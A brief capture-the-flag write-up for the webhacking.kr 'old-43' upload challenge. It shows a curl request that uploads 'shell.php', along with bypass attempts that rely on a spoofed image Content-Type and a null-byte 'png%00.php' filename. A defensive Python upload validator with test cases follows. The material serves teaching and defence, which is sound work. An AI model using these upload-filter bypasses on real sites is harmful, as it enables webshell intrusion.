old-43 -- No Brainer Webshell

URL: http://webhacking.kr:10004

For the first upload I uploaded a PNG image and it was a success. Then I tried the php, php5 and png%00.php extensions but still got "wrong type". After some tinkering I inspected the request itself:

curl 'http://webhacking.kr:10004/index.php' \
  -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynWTWEfEA2qciAE2z' \
  -H 'Cookie: PHPSESSID=fqn9tv8tbam8b4gi2edk8vc8bu' \
  -d $'------WebKitFormBoundarynWTWEfEA2qciAE2z\r\nContent-Disposition: form-data; name="file"; filename="shell.php"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundarynWTWEfEA2qciAE2z--\r\n'

There's one more thing we can change: Content-Type: application/octet-stream -> Content-Type: image/png

Hmm... The PHP script was empty when trying to execute the commands!

I decided to investigate with Burp, and when I uploaded the file it was a success without changing the headers...

I expected a little more lol
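
An added example, not part of the original write-up: the request above points at the Content-Type of the multipart part, a value the client sets, as the thing the filter inspects. The server's code is not shown on the page, so `naive_check` is an assumed model of such a filter, and `hardened_check` (a hypothetical name) shows the server-side validation that does not depend on it. All sample inputs are constructed.

```python
import os
import secrets

# Allowlist: extension -> leading magic bytes the content must start with.
ALLOWED = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}

# Constructed sample: a PNG signature followed by filler bytes.
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8


def naive_check(filename, declared_type, data):
    """Assumed weak filter: trusts the part's client-declared Content-Type."""
    return declared_type.startswith("image/")


def hardened_check(filename, declared_type, data):
    """Return a server-chosen storage name, or None if the upload is rejected.

    declared_type is ignored on purpose: the client controls it.
    """
    base = os.path.basename(filename.replace("\\", "/"))
    if "\x00" in base:                      # e.g. a decoded png%00.php
        return None
    ext = os.path.splitext(base)[1].lower()
    magic = ALLOWED.get(ext)
    if magic is None:                       # .php, .php5, no extension, ...
        return None
    if not data.startswith(magic):          # content must match the extension
        return None
    # Never reuse the client's filename on disk.
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    cases = [
        ("cat.png", "image/png", PNG_SAMPLE),
        ("shell.php", "application/octet-stream", b""),
        ("shell.php", "image/png", b""),    # the page's request, type changed
        ("fake.png", "image/png", b"<?php"),
    ]
    for name, ctype, body in cases:
        print(name, ctype, naive_check(name, ctype, body),
              hardened_check(name, ctype, body))
```

Storing uploads outside the web root, or in a directory where the PHP handler is disabled, keeps a file that slips past validation from being executed.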